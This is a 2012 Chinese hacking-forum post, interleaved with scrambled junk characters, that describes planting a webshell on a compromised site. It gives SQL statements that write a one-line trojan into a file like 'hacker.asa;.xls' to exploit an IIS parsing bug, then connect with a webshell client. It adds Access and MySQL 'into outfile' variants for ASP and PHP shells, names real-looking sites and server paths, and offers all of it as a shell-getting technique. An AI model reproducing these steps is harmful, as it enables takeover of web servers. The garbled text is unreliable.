好不容易进了后台,发现啥上传啊。备份啊多木有。
6 l" m6 D$ n, J+ ?3 k0 y" Wwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
' F# b+ d6 d. ^; t/ J文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
/ m6 U$ K- d P t! w然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
2 \) S: d) s4 F4 O' q: k1.create table cmd (a varchar(50))
$ y s! j, y4 p- B2.insert into cmd (a) values (‘‘)
' w0 h7 V6 G5 {0 A5 o6 u3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd* Q4 K* Z1 O/ E8 P
(把表cmd的内容导出为物理路径的一个EXCEL文件)' K( m% @6 X/ s. r) ~
4.drop table cmd* D/ @9 A; ^9 X1 g% v+ P8 O" z
利用IIS的BUG成功拿到了WEBSHELL。
( M6 J4 x1 {$ o4 g6 l0 G) t
3 T! a$ H7 H/ T直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话0 ^8 p) _2 r/ r! P( e
9 ~$ v* M( _& c) O- ]' f$ U
SQL语句意思解释:+ x% \0 ^9 l- y! s
第一句
+ K! t1 v1 V! i 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
# C5 B$ H2 z, n2 ]/ M5 i6 j5 C$ f* z7 A" t2 G5 r+ s
第二句- z! R# ?+ @) d% M2 v
在表cmd的a字段插入一句话木马* b; n! I: z4 x4 [( r0 x2 \
第三句4 B4 t; q2 i; M( q" Q
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件) `. z; `) M; @+ r) p
' t# o( M" m" R6 ` 第四句' O; n# s8 _# h* B3 ]# j J) m
删除建立的cmd表; p8 e9 v% Z3 O! r
& u+ \/ u% `1 L, v 以下内容为测试:( A u7 ~& }" L; X/ y2 F/ d+ J
Access利用后台SQL执行命令功能导出WebShell:
9 p i0 B" r* N/ `1 { 这个更简单:; V. H$ S$ K/ n4 H
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]# ?- w" o+ M! U, r V
或者5 u1 u: c6 X6 C9 G& Y- V+ ]9 V
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
% b$ h z* D7 z) }* J' p8 G, Z2 e$ `
0 C* q* a+ X6 s. a% ]* ~ 后台有执行SQL语句功能(vote为已知表段)
! @1 H4 J W6 R 希望对大家有所帮助拿shell的又一个思路
* s; T2 a/ q. i' V. l" o+ r |
发表于 2012-9-13 17:53:58
收藏
支持
反对